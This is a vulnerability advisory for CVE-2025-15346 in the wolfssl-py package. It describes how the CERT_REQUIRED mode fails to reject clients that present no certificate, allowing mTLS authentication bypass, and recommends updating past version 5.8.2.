PT-2026-1769 · Pypi · Wolfssl-Py
Matan Radomski
·
Publicado
2026-01-07
·
Atualizado
2026-01-09
·
CVE-2025-15346
CVSS v4.0
9.3
Crítica
| Vetor | AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:X/U:X |
Name of the Vulnerable Software and Affected Versions
wolfssl-py versions up to and including 5.8.2
Description
A flaw exists in the handling of
verify mode = CERT REQUIRED within the wolfssl Python package (wolfssl-py). The absence of the WOLFSSL VERIFY FAIL IF NO PEER CERT flag causes the software to behave as if CERT OPTIONAL is enabled, meaning a peer certificate is verified if presented, but connections are incorrectly authenticated when no client certificate is provided. This results in improper authentication, potentially allowing attackers to bypass mutual TLS (mTLS) client authentication by omitting a client certificate during the TLS handshake.Recommendations
Versions up to and including 5.8.2 should be updated to a newer version that includes the
WOLFSSL VERIFY FAIL IF NO PEER CERT flag when verify mode = CERT REQUIRED is used.Correção
Missing Authentication
Improper Authentication
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Identificadores relacionados
Produtos afetados
Wolfssl-Py